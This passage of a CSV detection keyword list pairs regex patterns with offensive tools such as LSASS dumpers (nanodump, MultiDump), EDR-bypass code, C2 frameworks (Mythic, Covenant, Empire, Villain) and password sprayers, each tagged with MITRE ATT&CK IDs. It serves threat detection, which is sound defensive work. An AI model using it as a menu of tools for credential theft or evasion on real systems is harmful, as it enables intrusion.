Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-query.nse*",".{0,1000}\sms\-sql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-tables.nse*",".{0,1000}\sms\-sql\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-xp-cmdshell.nse*",".{0,1000}\sms\-sql\-xp\-cmdshell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mtrace.nse*",".{0,1000}\smtrace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* MultiDump.exe*",".{0,1000}\sMultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "* murmur-version.nse*",".{0,1000}\smurmur\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* MutationGate.cpp*",".{0,1000}\sMutationGate\.cpp.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "* mysql-audit.nse*",".{0,1000}\smysql\-audit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-brute.nse*",".{0,1000}\smysql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-databases.nse*",".{0,1000}\smysql\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-dump-hashes.nse*",".{0,1000}\smysql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-empty-password.nse*",".{0,1000}\smysql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-enum.nse*",".{0,1000}\smysql\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-info.nse*",".{0,1000}\smysql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-query.nse*",".{0,1000}\smysql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-users.nse*",".{0,1000}\smysql\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-variables.nse*",".{0,1000}\smysql\-variables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-vuln-cve2012-2122.nse*",".{0,1000}\smysql\-vuln\-cve2012\-2122\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mystikal.py*",".{0,1000}\smystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "* mythic start*",".{0,1000}\smythic\sstart.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* mythic_container.Mythic*",".{0,1000}\smythic_container\.Mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* mythic_payloadtype_container*",".{0,1000}\smythic_payloadtype_container.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* mythic-cli*",".{0,1000}\smythic\-cli.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* -n *TotallyLegitTool*",".{0,1000}\s\-n\s.{0,1000}TotallyLegitTool.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","5","435","157","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "* -Name ""Test.PME"" *",".{0,1000}\s\-Name\s\""Test\.PME\""\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* --name covenant *",".{0,1000}\s\-\-name\scovenant\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* nanodump*",".{0,1000}\snanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* nanodump/*",".{0,1000}\snanodump\/.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* NativeDump.exe*",".{0,1000}\sNativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "* nat-pmp-info.nse*",".{0,1000}\snat\-pmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nat-pmp-mapport.nse*",".{0,1000}\snat\-pmp\-mapport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nbd-info.nse*",".{0,1000}\snbd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -NBNSBruteForce*",".{0,1000}\s\-NBNSBruteForce.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* nbns-interfaces.nse*",".{0,1000}\snbns\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nbnsspoof.py*",".{0,1000}\snbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* -NBNSTTL *",".{0,1000}\s\-NBNSTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* nbstat.nse*",".{0,1000}\snbstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nc_srv.bat*",".{0,1000}\snc_srv\.bat.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* ncp-enum-users.nse*",".{0,1000}\sncp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ncp-serverinfo.nse*",".{0,1000}\sncp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ndmp-fs-info.nse*",".{0,1000}\sndmp\-fs\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ndmp-version.nse*",".{0,1000}\sndmp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* needs High Integrity Privileges to dump the relevant process!*",".{0,1000}\sneeds\sHigh\sIntegrity\sPrivileges\sto\sdump\sthe\srelevant\sprocess!.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "* nemesis_connector.py*",".{0,1000}\snemesis_connector\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* nemesis_db.py*",".{0,1000}\snemesis_db\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* 
nemesis_reg_collect_parser.py*",".{0,1000}\snemesis_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* nemesis-cli.py*",".{0,1000}\snemesis\-cli\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* --neo4j-host *",".{0,1000}\s\-\-neo4j\-host\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --neo4j-host *--neo4j-port*",".{0,1000}\s\-\-neo4j\-host\s.{0,1000}\-\-neo4j\-port.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "* -neo4j-password *",".{0,1000}\s\-neo4j\-password\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --neo4j-port *",".{0,1000}\s\-\-neo4j\-port\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool 
for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --neo4j-user *",".{0,1000}\s\-\-neo4j\-user\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* nessus-brute.nse*",".{0,1000}\snessus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nessus-xmlrpc-brute.nse*",".{0,1000}\snessus\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-auth-bypass.nse*",".{0,1000}\snetbus\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-brute.nse*",".{0,1000}\snetbus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-info.nse*",".{0,1000}\snetbus\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-version.nse*",".{0,1000}\snetbus\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --netcat-port *",".{0,1000}\s\-\-netcat\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "* NetClone.exe*",".{0,1000}\sNetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "* netripper*",".{0,1000}\snetripper.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - 